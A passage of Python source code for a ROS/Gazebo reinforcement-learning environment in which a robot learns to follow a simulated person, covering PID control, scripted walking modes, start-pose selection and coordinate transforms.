rospy.logdebug("waiting for pos to be available {}/{}".format(counter_problem/10, 20))
time.sleep(0.001)
counter_problem += 1
if counter_problem > 200:
raise Exception('Probable shared memory issue happend')
return self.state_['orientation']
def is_current_state_ready(self):
return (self.state_['position'][0] is not None)
def is_observation_ready(self):
return (self.pos_history.avg_frame_rate is not None and\
self.orientation_history.avg_frame_rate is not None and\
self.velocity_history.avg_frame_rate is not None)
def update(self, init_pose):
self.alive = True
self.goal = {"pos": None, "orientation": None}
if "person" is self.name:
self.angular_pid = PID(0.5, 0, 0.03, setpoint=0)
self.linear_pid = PID(1.0, 0, 0.05, setpoint=0)
else:
self.angular_pid = PID(2.5, 0, 0.03, setpoint=0)
self.linear_pid = PID(2.5, 0, 0.05, setpoint=0)
self.pos_history = History(self.window_size_history, self.update_rate_states)
self.orientation_history = History(self.window_size_history, self.update_rate_states)
self.velocity_history = History(self.window_size_history, self.update_rate_states)
self.velocity_history.add_element((0,0))
self.pos_history.add_element((init_pose["pos"][0],init_pose["pos"][1]))
self.orientation_history.add_element(init_pose["orientation"])
self.log_history = []
if self.is_testing:
self.all_pose_ = []
#self.prev_call_gazeboros_ = None
#self.is_collided = False
self.is_pause = False
self.reset = False
def add_log(self, log):
self.log_history.append(log)
def remove(self):
self.reset = True
def set_state(self, state):
self.state_["position"] = state["position"]
self.state_["orientation"] = state["orientation"]
self.state_["velocity"] = state["velocity"]
self.orientation_history.add_element(state["orientation"])
self.pos_history.add_element(state["position"])
self.velocity_history.add_element(state["velocity"])
if self.is_testing and abs (rospy.Time.now().to_sec()- self.last_time_added) > 0.01:
self.all_pose_.append(self.state_.copy())
self.last_time_added = rospy.Time.now().to_sec()
def get_velocity(self):
return self.velocity_history.get_latest()
def pause(self):
self.is_pause = True
self.stop_robot()
def resume(self):
self.is_pause = False
    def take_action(self, action):
        """Apply one policy action, either as a navigation goal or raw velocities.

        Args:
            action: sequence of normalized values in [-1, 1].  With
                ``use_goal`` the first two entries encode a goal position
                relative to ``self.relative``; otherwise they scale the
                linear and angular velocity directly.
        """
        if self.is_pause:
            return
        if self.use_goal:
            # Denormalize into a position relative to `self.relative`, then
            # convert to the global frame and store as the current goal.
            pos = GazeborosEnv.denormalize(action[0:2], self.max_rel_pos_range)
            pos_global = GazeborosEnv.get_global_position(pos, self.relative)
            self.goal["orientation"] = self.get_orientation()
            self.goal["pos"] = pos_global
            if self.use_movebase:
                #orientation = GazeborosEnv.denormalize(action[2], math.pi)
                self.movebase_client_goal(pos_global, self.goal["orientation"])
        else:
            # Direct velocity control: clamp each component to the base limits.
            linear_vel = max(min(action[0]*self.max_linear_vel, self.max_linear_vel), -self.max_linear_vel)
            angular_vel = max(min(action[1]*self.max_angular_vel, self.max_angular_vel), -self.max_angular_vel)
            cmd_vel = Twist()
            cmd_vel.linear.x = linear_vel #float(self.current_vel_.linear.x -(self.current_vel_.linear.x - linear_vel)*0.9)
            cmd_vel.angular.z = angular_vel #-float(self.current_vel_.angular.z - (self.current_vel_.angular.z - angular_vel)*0.9)
            self.current_vel_ = cmd_vel
            self.cmd_vel_pub.publish(cmd_vel)
def stop_robot(self):
self.cmd_vel_pub.publish(Twist())
def angle_distance_to_point(self, pos):
current_pos = self.get_pos()
if current_pos[0] is None:
return None, None
angle = math.atan2(pos[1] - current_pos[1], pos[0] - current_pos[0])
distance = math.hypot(pos[0] - current_pos[0], pos[1] - current_pos[1])
angle = (angle - self.state_["orientation"] + math.pi) % (math.pi * 2) - math.pi
return angle, distance
def publish_cmd_vel(self, linear, angular):
cmd_vel = Twist()
angular_vel = min(max(angular, -self.max_angular_vel),self.max_angular_vel)
linear_vel = min(max(linear, 0), self.max_linear_vel)
cmd_vel.linear.x = float(linear_vel)
cmd_vel.angular.z = float(angular_vel)
self.cmd_vel_pub.publish(cmd_vel)
    def use_selected_person_mod(self, person_mode):
        """Drive the person with scripted motion pattern `person_mode` (0-6).

        Loops forever (the while-condition never changes inside the loop),
        publishing a velocity command every ~2 ms; it exits only via the
        pause or reset flags.  Modes 0-3 are fixed velocity profiles; modes
        4-6 blend the current velocity toward a randomized target.
        """
        while person_mode <= 6:
            if self.is_pause:
                self.stop_robot()
                return
            if self.reset:
                self.stop_robot()
                return
            angular_vel = 0
            linear_vel = 0
            if person_mode == 0:
                # Full speed straight ahead.
                linear_vel = self.max_linear_vel
            if person_mode == 1:
                #linear_vel = self.max_linear_vel * random.random()
                linear_vel = self.max_linear_vel * 0.35
            elif person_mode == 2:
                # Gentle left arc.
                linear_vel = self.max_linear_vel/2
                angular_vel = self.max_angular_vel/6
            elif person_mode == 3:
                # Gentle right arc.
                linear_vel = self.max_linear_vel/2
                angular_vel = -self.max_angular_vel/6
            elif person_mode == 4:
                # Blend current linear speed halfway toward a random value
                # in [0.5, 1.0]; fixed right turn.
                linear_vel, angular_vel = self.get_velocity()
                linear_vel = linear_vel - (linear_vel - (random.random()/2 + 0.5))/2.
                angular_vel = -self.max_angular_vel/6
            elif person_mode == 5:
                # Same blend, fixed left turn.
                linear_vel, angular_vel = self.get_velocity()
                linear_vel = linear_vel - (linear_vel - (random.random()/2 + 0.5))/2.
                angular_vel = self.max_angular_vel/6
            elif person_mode == 6:
                # Randomize both linear and angular components.
                linear_vel, angular_vel = self.get_velocity()
                linear_vel = linear_vel - (linear_vel - (random.random()/2 + 0.5))/2.
                angular_vel = angular_vel - (angular_vel - (random.random()-0.5)*2)/2.
            self.publish_cmd_vel(linear_vel, angular_vel)
            time.sleep(0.002)
    def go_to_goal(self):
        """Worker loop: repeatedly chase ``self.goal["pos"]`` with the PIDs.

        Runs until reset.  Each outer iteration waits for a goal to appear,
        then runs an inner control loop until within 0.1 m of it or a 5 s
        timeout elapses, after which the base is stopped and a fresh goal is
        awaited.  Honours the pause/reset flags at every step.
        """
        while True:
            if self.reset:
                return
            while self.goal["pos"] is None:
                time.sleep(0.1)
                continue
            diff_angle, distance = self.angle_distance_to_point(self.goal["pos"])
            time_prev = rospy.Time.now().to_sec()
            while not distance < 0.1 and abs(rospy.Time.now().to_sec() - time_prev) < 5:
                if self.is_pause:
                    self.stop_robot()
                    return
                if self.reset:
                    self.stop_robot()
                    return
                diff_angle, distance = self.angle_distance_to_point(self.goal["pos"])
                if distance is None:
                    return
                if self.reset:
                    return
                # Negative sign: a positive bearing error steers clockwise.
                angular_vel = -min(max(self.angular_pid(diff_angle), -self.max_angular_vel),self.max_angular_vel)
                linear_vel = min(max(self.linear_pid(-distance), 0), self.max_linear_vel)
                # Scale speed down as heading error grows (factor 1 at zero error).
                linear_vel = linear_vel * math.pow((abs(math.pi - abs(diff_angle))/math.pi), 1.5)
                self.publish_cmd_vel(linear_vel, angular_vel)
                time.sleep(0.01)
            self.stop_robot()
    def go_to_pos(self, pos, stop_after_getting=False):
        """Drive toward world point `pos` using the PID controllers.

        Gives up once within 0.2 m or after a 5 s timeout; honours the
        pause/reset flags at every step.

        Args:
            pos: (x, y) target in the world frame.
            stop_after_getting: if True, publish a stop command when done.
        """
        if self.is_pause:
            self.stop_robot()
            return
        if self.reset:
            return
        diff_angle, distance = self.angle_distance_to_point(pos)
        if distance is None:
            print (self.get_pos())
            return
        time_prev = rospy.Time.now().to_sec()
        # Control loop: run until close enough or the 5 s timeout elapses.
        while not distance < 0.2 and abs(rospy.Time.now().to_sec() - time_prev) < 5:
            if self.is_pause:
                self.stop_robot()
                return
            if self.reset:
                return
            diff_angle, distance = self.angle_distance_to_point(pos)
            if distance is None:
                return
            if self.reset:
                return
            # Negative sign: a positive bearing error steers clockwise.
            angular_vel = -min(max(self.angular_pid(diff_angle), -self.max_angular_vel),self.max_angular_vel)
            linear_vel = min(max(self.linear_pid(-distance), 0), self.max_linear_vel)
            # Scale speed down as heading error grows (factor 1 at zero error).
            linear_vel = linear_vel * math.pow((abs(math.pi - abs(diff_angle))/math.pi), 2)
            self.publish_cmd_vel(linear_vel, angular_vel)
            time.sleep(0.01)
        if stop_after_getting:
            self.stop_robot()
def get_goal(self):
counter_problem = 0
while self.goal["pos"] is None:
if self.reset:
return (None, None)
if counter_problem > 20:
rospy.logwarn("waiting for goal to be available {}/{}".format(counter_problem/10, 20))
time.sleep(0.01)
counter_problem += 1
if counter_problem > 200:
raise Exception('Probable shared memory issue happend')
# if not self.use_movebase:
# pos = GazeborosEnv.get_global_position(self.goal["pos"], self)
# goal = {"pos":pos, "orientation":None}
# else:
# goal = self.goal
return self.goal
def get_pos(self):
counter_problem = 0
while self.state_['position'] is None:
if self.reset:
return (None, None)
if counter_problem > 20:
rospy.logwarn("waiting for pos to be available {}/{}".format(counter_problem/10, 20))
time.sleep(0.01)
counter_problem += 1
if counter_problem > 200:
raise Exception('Probable shared memory issue happend')
return self.state_['position']
def get_laser_image(self):
return np.expand_dims(self.scan_image, axis=2)
class GazeborosEnv(gym.Env):
    def __init__(self, is_evaluation=False):
        """Configure the person-following gym environment (no ROS calls yet).

        Args:
            is_evaluation: use the fixed evaluation start poses and paths.
        """
        self.is_evaluation_ = is_evaluation
        # self.bridge = CvBridge()
        # self.image_pub = rospy.Publisher("image_observation", Image)
        # self.image_pub_gt = rospy.Publisher("image_observation_gt", Image)
        self.is_reseting = True
        self.use_path = True
        self.use_jackal = True
        self.lock = _thread.allocate_lock()
        # Test scenarios: idx -> (person_mode, path start idx, name,
        # uses-stored-path flag[, robot-offset flag]).
        self.path_follower_test_settings = {0:(0,0, "straight",False), 1:(2,0, "right", False), 2:(3,0, "left", False),\
                3:(1,4, "straight_Behind", False), 4:(2,3, "right_behind", False), 5:(3,3, "left_behind", False), 6:(7,2, "traj_1", True, True),\
                7:(7, 12, "traj_2", True, True), 8:(7, 43, "traj_3", True),\
                9:(2,1, "right_left", False), 10:(2,2, "right_right", False),\
                11:(3,1, "left_left", False), 12:(3,2, "left_right", False)\
                }
        #self.path_follower_test_settings = {0:(7, 43, "traj_3", True)#(7,2, "traj_1", True, True), 1:(7, 12, "traj_2", True, True)}
        # Behaviour switches; consumed by get_init_pos_robot_person,
        # path_follower and get_observation.
        self.is_testing = False
        self.small_window_size = False
        self.use_predifined_mode_person = True
        self.use_goal = True
        self.use_orientation_in_observation = True
        self.collision_distance = 0.3
        self.best_distance = 1.5
        self.robot_mode = 0
        self.window_size = 10
        self.use_movebase = True
        self.use_reachability = False
        self.path_follower_current_setting_idx = 0
        self.use_supervise_action = False
        self.mode_person = 0
        self.use_noise = True
        self.is_use_test_setting = False
        self.use_reverse = True
        if self.small_window_size:
            self.window_size = 5
        if self.is_testing:
            # Testing disables observation noise and path reversal.
            self.use_noise = False
            self.use_reverse = False
            self.is_use_test_setting = True
        self.fallen = False
        self.is_max_distance = False
        self.use_random_around_person_ = False
        self.max_mod_person_ = 7
        self.wait_observation_ = 0
        # being use for observation visualization
        self.center_pos_ = (0, 0)
        self.colors_visualization = cv.cvtColor(cv.applyColorMap(np.arange(0, 255, dtype=np.uint8), cv.COLORMAP_WINTER), cv.COLOR_BGR2RGB).reshape(255,3).tolist()
        self.color_index = 0
        self.first_call_observation = True
        self.test_simulation_ = False
        # Observation = position histories + velocities (+ optional relative
        # heading) + previous action; size shrinks with the smaller window.
        observation_dimentation = 46
        if self.use_orientation_in_observation:
            observation_dimentation += 1
        if self.small_window_size:
            observation_dimentation -= 20
        self.observation_space = gym.spaces.Box(low=-1, high=1, shape=(observation_dimentation,))
        self.current_obsevation_image_ = np.zeros([2000,2000,3])
        self.current_obsevation_image_.fill(255)
        self.prev_action = (0, 0)
        self.action_space = gym.spaces.Box(low=np.array([-1.0, -1.0]), high=np.array([1.0, 1.0]), dtype=np.float32)
        self.min_distance = 1
        self.max_distance = 2.5
        if self.test_simulation_ or self.is_evaluation_:
            self.max_numb_steps = 80
        elif self.is_use_test_setting:
            self.max_numb_steps = 100
        else:
            self.max_numb_steps = 80
        self.reward_range = [-1, 1]
        self.reachabilit_value = None
        if self.use_reachability:
            with open('data/reachability.pkl', 'rb') as f:
                self.reachabilit_value = pickle.load(f)
def get_test_path_number(self):
rospy.loginfo("current path idx: {}".format(self.path_follower_current_setting_idx))
return self.path_follower_test_settings[self.path_follower_current_setting_idx][2]
def use_test_setting(self):
self.is_use_test_setting = True
<<<<<<< HEAD
=======
>>>>>>> MCTS
    def set_agent(self, agent_num):
        """Bind this env to agent slot `agent_num` and start the ROS plumbing.

        Initializes the ROS node, the Gazebo set_model_state service proxy,
        the TEB obstacle publisher and both robots, then loads the stored
        person trajectories (each path is replicated over a grid of start
        angles).  Finally subscribes to /gazebo/model_states and runs the
        first simulator init under the shared lock.
        """
        try:
            self.node = rospy.init_node('gym_gazeboros_{}'.format(agent_num))
        except Exception as e:
            # Another env in this process may already own the node.
            rospy.logerr("probably already init in another node {}".format(e))
        rospy.wait_for_service('/gazebo/set_model_state')
        self.set_model_state_sp = rospy.ServiceProxy('/gazebo/set_model_state', SetModelState)
        date_time = datetime.now().strftime("%m_%d_%Y_%H_%M_%S")
        self.agent_num = agent_num
        self.obstacle_pub_ = rospy.Publisher('/move_base_node_{}/TebLocalPlannerROS/obstacles'.format(self.agent_num), ObstacleArrayMsg, queue_size=1)
        self.create_robots()
        self.path = {}
        self.paths = []
        self.log_file = None
        try:
            with open('data/person_trajectories_rl.pkl', 'rb') as f:
                paths = pickle.load(f)
                for path in paths:
                    angle_person = path['start_person']['orientation']
                    # Augment each stored path: place the robot 2 m from the
                    # person at every 10 deg bearing, with its own heading
                    # swept in 90 deg steps.
                    for angle in [x for x in range(0, 360, 10)]:
                        for angle_robot_person in [x for x in range(0, 360, 90)]:
                            path_angle = path.copy()
                            angle_from_person = np.deg2rad(angle) + angle_person
                            angle_person_robot = np.deg2rad(angle_robot_person) + angle_person
                            path_angle['start_robot']['pos'] = (path_angle['start_person']['pos'][0] + math.cos(angle_from_person)*2, path_angle['start_person']['pos'][1] + math.sin(angle_from_person)*2)
                            path_angle['start_robot']['orientation'] = angle_person_robot
                            path_angle['name'] = path['name'] + " " + str(angle) +" " + str(angle_robot_person)
                            self.paths.append(path_angle)
                self.path_idx = -1
                self.path = self.paths[self.path_idx]
        except Exception as e:
            print("error happend in writing {}".format(e))
        self.agent_num = agent_num
        self.state_cb_prev_time = None
        self.model_states_sub = rospy.Subscriber("/gazebo/model_states", ModelStates, self.model_states_cb)
        with self.lock:
            self.init_simulator()
def model_states_cb(self, states_msg):
for model_idx in range(len(states_msg.name)):
found = False
for robot in [self.robot, self.person]:
if states_msg.name[model_idx] == robot.name:
found = True
break
if not found:
continue
pos = states_msg.pose[model_idx]
euler = quat2euler(pos.orientation.x, pos.orientation.y, pos.orientation.z, pos.orientation.w)
orientation = euler[0]
fall_angle = np.deg2rad(90)
if abs(abs(euler[1]) - fall_angle)< 0.1 or abs(abs(euler[2]) - fall_angle)<0.1:
self.fallen = True
# get velocity
twist = states_msg.twist[model_idx]
linear_vel = twist.linear.x
angular_vel = twist.angular.z
pos_x = pos.position.x
pos_y = pos.position.y
state = {}
state["velocity"] = (linear_vel, angular_vel)
state["position"] = (pos_x, pos_y)
state["orientation"] = orientation
robot.set_state(state)
if self.use_movebase and robot.name == self.person.name:
obstacle_msg_array = ObstacleArrayMsg()
obstacle_msg_array.header.stamp = rospy.Time.now()
obstacle_msg_array.header.frame_id = "tb3_{}/odom".format(self.agent_num)
obstacle_msg = ObstacleMsg()
obstacle_msg.header = obstacle_msg_array.header
obstacle_msg.id = 0
for x in range (5):
for y in range (5):
point = Point32()
point.x = pos.position.x + (x-2)*0.1
point.y = pos.position.y + (y-2)*0.1
point.z = pos.position.z
obstacle_msg.polygon.points.append(point)
obstacle_msg.orientation.x = pos.orientation.x
obstacle_msg.orientation.y = pos.orientation.y
obstacle_msg.orientation.z = pos.orientation.z
obstacle_msg.orientation.w = pos.orientation.w
obstacle_msg.velocities.twist.linear.x = twist.linear.x
obstacle_msg.velocities.twist.angular.z = twist.linear.z
obstacle_msg_array.obstacles.append(obstacle_msg)
self.obstacle_pub_.publish(obstacle_msg_array)
def create_robots(self):
self.person = Robot('person_{}'.format(self.agent_num),
max_angular_speed=1, max_linear_speed=.6, agent_num=self.agent_num, window_size=self.window_size, is_testing=self.is_testing)
relative = self.person
if self.use_goal:
relative = self.person
self.robot = Robot('tb3_{}'.format(self.agent_num),
max_angular_speed=1.8, max_linear_speed=0.8, relative=relative, agent_num=self.agent_num, use_goal=self.use_goal, use_movebase=self.use_movebase ,use_jackal=self.use_jackal, window_size=self.window_size, is_testing=self.is_testing)
def find_random_point_in_circle(self, radious, min_distance, around_point):
max_r = 2
r = (radious - min_distance) * math.sqrt(random.random()) + min_distance
theta = random.random() * 2 * math.pi
x = around_point[0] + r * math.cos(theta)
y = around_point[1] + r * math.sin(theta)
return (x, y)
def set_mode_person_based_on_episode_number(self, episode_number):
if episode_number < 500:
self.mode_person = 0
elif episode_number < 510:
self.mode_person = 1
elif episode_number < 700:
self.mode_person = 3
elif episode_number < 900:
self.mode_person = 5
elif episode_number < 1000:
self.mode_person = 6
else:
#self.mode_person = 7
if random.random()>0.5:
self.mode_person = 7
else:
self.mode_person = random.randint(0, 6)
    def get_init_pos_robot_person(self):
        """Pick start poses for the robot and the person for the next episode.

        The source of the poses depends on the mode: evaluation uses the
        stored path's start poses; fixed test settings place the person at
        the origin with the robot at a preset bearing; otherwise poses come
        from a random index on the person's path (optionally reversed), with
        the robot placed >=1.6 m further along it.  Outside testing, +-0.5
        uniform noise is added to the robot's pose.

        Returns:
            (init_pos_robot, init_pos_person) dicts with "pos"/"orientation".
        """
        if self.is_evaluation_:
            idx_start = 0
        elif self.is_use_test_setting:
            idx_start = self.path_follower_test_settings[self.path_follower_current_setting_idx][1]
        else:
            idx_start = random.randint(0, len(self.path["points"]) - 20)
        self.current_path_idx = idx_start
        if not self.is_use_test_setting and self.use_reverse and random.random() > 0.5:
            self.path["points"].reverse()
        if self.is_evaluation_:
            init_pos_person = self.path["start_person"]
            init_pos_robot = self.path["start_robot"]
        elif self.is_use_test_setting and not self.path_follower_test_settings[self.path_follower_current_setting_idx][3]:
            # Fixed-bearing test case: person at origin, robot 1.5 m away.
            init_pos_person = {"pos": (0, 0), "orientation":0}
            mode = self.path_follower_test_settings[self.path_follower_current_setting_idx][1]
            if mode == 0:
                orinetation_person_rob = 0
            elif mode == 1:
                orinetation_person_rob = -math.pi /4.
            elif mode == 2:
                orinetation_person_rob = math.pi /4.
            elif mode == 3:
                orinetation_person_rob = -math.pi
            else:
                orinetation_person_rob = math.pi/8*7
            pos_robot = (1.5*math.cos(orinetation_person_rob), 1.5*math.sin(orinetation_person_rob))
            init_pos_robot = {"pos": pos_robot, "orientation":0}
        elif not self.use_path:
            # Free placement: random person heading, robot sampled nearby.
            init_pos_person = {"pos": (0, 0), "orientation": random.random()*2*math.pi - math.pi}
            ahead_person = (init_pos_person['pos'][0] + math.cos(init_pos_person["orientation"]) * 2, init_pos_person['pos'][1] + math.sin(init_pos_person["orientation"]) * 2)
            random_pos_robot = self.find_random_point_in_circle(1.5, 2.5, init_pos_person["pos"])
            init_pos_robot = {"pos": random_pos_robot,\
                              "orientation": init_pos_person["orientation"]}#random.random()*2*math.pi - math.pi}#self.calculate_angle_using_path(idx_start)}
        elif self.use_random_around_person_:
            init_pos_person = {"pos": self.path["points"][idx_start], "orientation": self.calculate_angle_using_path(idx_start)}
            init_pos_robot = {"pos": self.find_random_point_in_circle(1.5, 1, self.path["points"][idx_start]),\
                              "orientation": random.random()*2*math.pi - math.pi}#self.calculate_angle_using_path(idx_start)}
        else:
            init_pos_person = {"pos": self.path["points"][idx_start], "orientation": self.calculate_angle_using_path(idx_start)}
            if self.is_use_test_setting and len(self.path_follower_test_settings[self.path_follower_current_setting_idx])>4 and self.path_follower_test_settings[self.path_follower_current_setting_idx][4] :
                # Offset variant: robot 2 m away at a fixed relative bearing.
                orinetation_person_rob = math.pi/2.2
                pos_robot = (self.path["points"][idx_start][0] + 2*math.cos(orinetation_person_rob+init_pos_person["orientation"]), self.path["points"][idx_start][1] + 2*math.sin(orinetation_person_rob+init_pos_person["orientation"]))
                init_pos_robot = {"pos": pos_robot, "orientation":self.calculate_angle_using_path(idx_start+5)}
            else:
                # Walk forward along the path until the robot start is at
                # least 1.6 m from the person start.
                idx_robot = idx_start + 1
                while (math.hypot(self.path["points"][idx_robot][1] - self.path["points"][idx_start][1],
                                  self.path["points"][idx_robot][0] - self.path["points"][idx_start][0]) < 1.6):
                    idx_robot += 1
                init_pos_robot = {"pos": self.path["points"][idx_robot],\
                                  "orientation": self.calculate_angle_using_path(idx_robot)}
            if not self.is_testing:
                # Training-time pose noise.
                init_pos_robot["pos"] = (init_pos_robot["pos"][0]+ random.random()-0.5, \
                                         init_pos_robot["pos"][1]+ random.random()-0.5)
                init_pos_robot["orientation"] = GazeborosEnv.wrap_pi_to_pi(init_pos_robot["orientation"] + random.random()-0.5)
        return init_pos_robot, init_pos_person
    def set_pos(self, name, pose):
        """Teleport Gazebo model `name` to `pose` via /gazebo/set_model_state.

        Each agent lives on its own z-layer (2.6 m apart) so multiple
        environments can share one world; jackal bases sit slightly higher
        than turtlebots.

        Args:
            name: Gazebo model name.
            pose: dict with "pos" (x, y) and "orientation" (yaw, radians).
        """
        set_model_msg = ModelState()
        set_model_msg.model_name = name
        self.prev_action = (0,0)
        # NOTE(review): euler2quat is called as (0, yaw, 0) and components
        # are mapped x<-q[3], y<-q[1], z<-q[2], w<-q[0]; this assumes a
        # (w, x, y, z) return order and a specific axes convention --
        # confirm against the quaternion library's documentation.
        quaternion_rotation = euler2quat(0, pose["orientation"], 0)
        set_model_msg.pose.orientation.x = quaternion_rotation[3]
        set_model_msg.pose.orientation.y = quaternion_rotation[1]
        set_model_msg.pose.orientation.z = quaternion_rotation[2]
        set_model_msg.pose.orientation.w = quaternion_rotation[0]
        if self.use_jackal and "tb3" in name:
            set_model_msg.pose.position.z = 2.6 * self.agent_num + 0.1635
        else:
            set_model_msg.pose.position.z = 2.6 * self.agent_num + 0.099
        set_model_msg.pose.position.x = pose["pos"][0]
        set_model_msg.pose.position.y = pose["pos"][1]
        rospy.wait_for_service('/gazebo/set_model_state')
        self.set_model_state_sp(set_model_msg)
    def init_simulator(self):
        """Reset the world for a new episode.

        Cancels outstanding move_base goals, stops both agents, teleports
        them to fresh start poses, re-arms their per-episode state, and
        (re)starts the person's path-follower daemon thread.  Leaves the
        environment unpaused.
        """
        self.number_of_steps = 0
        rospy.loginfo("init simulation called")
        self.is_pause = True
        init_pos_robot, init_pos_person = self.get_init_pos_robot_person()
        self.center_pos_ = init_pos_person["pos"]
        self.color_index = 0
        self.fallen = False
        self.is_max_distance = False
        self.first_call_observation = True
        self.current_obsevation_image_.fill(255)
        if self.use_movebase:
            self.robot.movebase_cancel_goals()
        rospy.sleep(0.5)
        self.person.stop_robot()
        self.robot.stop_robot()
        # if self.use_movebase:
        #     self.prev_action = (0,0, 0)
        # else:
        self.prev_action = (0,0)
        self.set_pos(self.robot.name, init_pos_robot)
        self.set_pos(self.person.name, init_pos_person)
        self.robot.update(init_pos_robot)
        self.person.update(init_pos_person)
        self.path_finished = False
        # Person motion runs on its own daemon thread; it exits on reset.
        self.position_thread = threading.Thread(target=self.path_follower, args=(self.current_path_idx, self.robot,))
        self.position_thread.daemon = True
        self.is_reseting = False
        self.position_thread.start()
        self.wait_observation_ = 0
        self.is_reseting = False
        self.robot.reset = False
        self.person.reset = False
        # self.resume_simulator()
        rospy.loginfo("init simulation finished")
        self.is_pause = False
def pause(self):
self.is_pause = True
self.person.pause()
self.robot.pause()
def resume_simulator(self):
rospy.loginfo("resume simulator")
self.is_pause = False
self.person.resume()
self.robot.resume()
rospy.loginfo("resumed simulator")
def calculate_angle_using_path(self, idx):
return math.atan2(self.path["points"][idx+1][1] - self.path["points"][idx][1], self.path["points"][idx+1][0] - self.path["points"][idx][0])
@staticmethod
def denormalize(value, max_val):
if type(value) == tuple or type(value) == list:
norm_val = [float(x) * max_val for x in value]
else:
norm_val = value * float(max_val)
return norm_val
@staticmethod
def normalize(value, max_val, zero_to_one=None):
if type(value) == tuple or type(value) == list:
norm_val = [x/float(max_val) for x in value]
else:
norm_val = value/float(max_val)
if zero_to_one is not None:
if type(value) == tuple or type(value) == list:
norm_val = [(x + 1)/2 for x in norm_val]
else:
norm_val = (norm_val + 1)/2.
return norm_val
@staticmethod
def get_global_position(pos_goal, center):
while not center.is_current_state_ready():
if center.reset:
rospy.logwarn("reseting so return none in rel pos rel: {} center".format(relative.is_current_state_ready(), center.is_current_state_ready()))
return (None, None)
time.sleep(0.01)
rospy.logwarn ("waiting for observation to be ready")
#relative_orientation = relative.state_['orientation']
center_pos = np.asarray(center.state_['position'])
center_orientation = center.state_['orientation']
#pos = [x * 5 for x in pos_goal]
relative_pos = np.asarray(pos_goal)
# transform the relative to center coordinat
rotation_matrix = np.asarray([[np.cos(center_orientation), np.sin(center_orientation)], [-np.sin(center_orientation), np.cos(center_orientation)]])
relative_pos = np.matmul(relative_pos, rotation_matrix)
global_pos = np.asarray(relative_pos + center_pos)
return global_pos
@staticmethod
def get_global_position_orientation(pos_goal, orientation_goal, center):
while not center.is_current_state_ready():
if center.reset:
rospy.logwarn("reseting so return none in rel pos rel: {} center".format(relative.is_current_state_ready(), center.is_current_state_ready()))
return (None, None)
time.sleep(0.01)
rospy.logwarn ("waiting for observation to be ready")
#relative_orientation = relative.state_['orientation']
center_pos = np.asarray(center.state_['position'])
center_orientation = center.state_['orientation']
#pos = [x * 5 for x in pos_goal]
relative_pos = np.asarray(pos_goal)
relative_pos2 = np.asarray((relative_pos[0] +math.cos(orientation_goal) , relative_pos[1] + math.sin(orientation_goal)))
# transform the relative to center coordinat
rotation_matrix = np.asarray([[np.cos(center_orientation), np.sin(center_orientation)], [-np.sin(center_orientation), np.cos(center_orientation)]])
relative_pos = np.matmul(relative_pos, rotation_matrix)
relative_pos2 = np.matmul(relative_pos2, rotation_matrix)
global_pos = np.asarray(relative_pos + center_pos)
global_pos2 = np.asarray(relative_pos2 + center_pos)
new_orientation = np.arctan2(global_pos2[1]-global_pos[1], global_pos2[0]-global_pos[0])
return global_pos, new_orientation
@staticmethod
def wrap_pi_to_pi(angle):
while angle > math.pi:
angle -= 2*math.pi
while angle < - math.pi:
angle += 2*math.pi
return angle
@staticmethod
def get_relative_heading_position(relative, center):
while not relative.is_current_state_ready() or not center.is_current_state_ready():
if relative.reset:
rospy.logwarn("reseting so return none in rel pos rel: {} center".format(relative.is_current_state_ready(), center.is_current_state_ready()))
return (None, None)
time.sleep(0.1)
rospy.loginfo ("waiting for observation to be ready heading pos")
relative_orientation = relative.state_['orientation']
center_pos = np.asarray(center.state_['position'])
center_orientation = center.state_['orientation']
# transform the relative to center coordinat
relative_pos = np.asarray(relative.state_['position'] - center_pos)
relative_pos2 = np.asarray((relative_pos[0] +math.cos(relative_orientation) , relative_pos[1] + math.sin(relative_orientation)))
rotation_matrix = np.asarray([[np.cos(-center_orientation), np.sin(-center_orientation)], [-np.sin(-center_orientation), np.cos(-center_orientation)]])
relative_pos = np.matmul(relative_pos, rotation_matrix)
relative_pos2 = np.matmul(relative_pos2, rotation_matrix)
angle_relative = np.arctan2(relative_pos2[1]-relative_pos[1], relative_pos2[0]-relative_pos[0])
return -angle_relative, relative_pos
@staticmethod
def get_relative_position(pos, center):
while not center.is_current_state_ready():
if center.reset:
rospy.loginfo("reseting so return none in rel pos rel: {} center".format(relative.is_current_state_ready(), center.is_current_state_ready()))
return (None, None)
time.sleep(0.01)
rospy.loginfo("waiting for observation to be ready relative pos")
#relative_orientation = relative.state_['orientation']
center_pos = np.asarray(center.state_['position'])
center_orientation = center.state_['orientation']
relative_pos = np.asarray(pos)
# transform the relative to center coordinat
relative_pos = np.asarray(relative_pos - center_pos)
rotation_matrix = np.asarray([[np.cos(-center_orientation), np.sin(-center_orientation)], [-np.sin(-center_orientation), np.cos(-center_orientation)]])
relative_pos = np.matmul(relative_pos, rotation_matrix)
return relative_pos
    def set_robot_to_auto(self):
        """Switch the robot controller into autonomous mode (robot_mode = 1)."""
        self.robot_mode = 1
    # NOTE(review): the string below is a stray class-level statement, not a
    # docstring attached to any method; it documents the robot_mode values
    # consumed by path_follower.
    """
    the function will check the self.robot_mode:
    0: will not move robot
    1: robot will try to go to a point after person
    """
    def path_follower(self, idx_start, robot):
        """Worker thread: walk the person along the stored path.

        Waits for the env to unpause, takes the shared lock, picks the
        person's behaviour mode for this episode, optionally starts the
        robot's go_to_goal thread, then steps through the path points from
        `idx_start`, honouring the pause/reset flags at every step.  The
        lock is released on every exit path after it was acquired.
        """
        counter = 0
        # Wait for the environment to be unpaused (bail out on reset).
        while self.is_pause:
            if self.is_reseting:
                rospy.loginfo( "path follower return as reseting ")
                return
            time.sleep(0.001)
            if counter > 10000:
                rospy.loginfo( "path follower waiting for pause to be false")
                counter = 0
            counter += 1
        rospy.loginfo( "path follower waiting for lock pause:{} reset:{}".format(self.is_pause, self.is_reseting))
        if self.lock.acquire(timeout=10):
            rospy.sleep(1.5)
            rospy.loginfo("path follower got the lock")
            # Choose the person's behaviour mode for this episode.
            if self.is_use_test_setting:
                mode_person = self.path_follower_test_settings[self.path_follower_current_setting_idx][0]
            elif self.test_simulation_:
                mode_person = -1
            elif self.is_evaluation_:
                mode_person = 2
            elif self.use_predifined_mode_person:
                mode_person = self.mode_person
            else:
                mode_person = random.randint(0, 7)
            #if self.agent_num == 2:
            #    mode_person = random.randint(1, self.max_mod_person_)
            #else:
            #    mode_person = 0
            # if self.agent_num == 0:
            #     mode_person = 5
            # elif self.agent_num == 1:
            #     mode_person = 2
            # elif self.agent_num == 2:
            #     mode_person = 3
            # elif self.agent_num == 3:
            #     mode_person = 7
            # else:
            #     mode_person = random.randint(1, self.max_mod_person_)
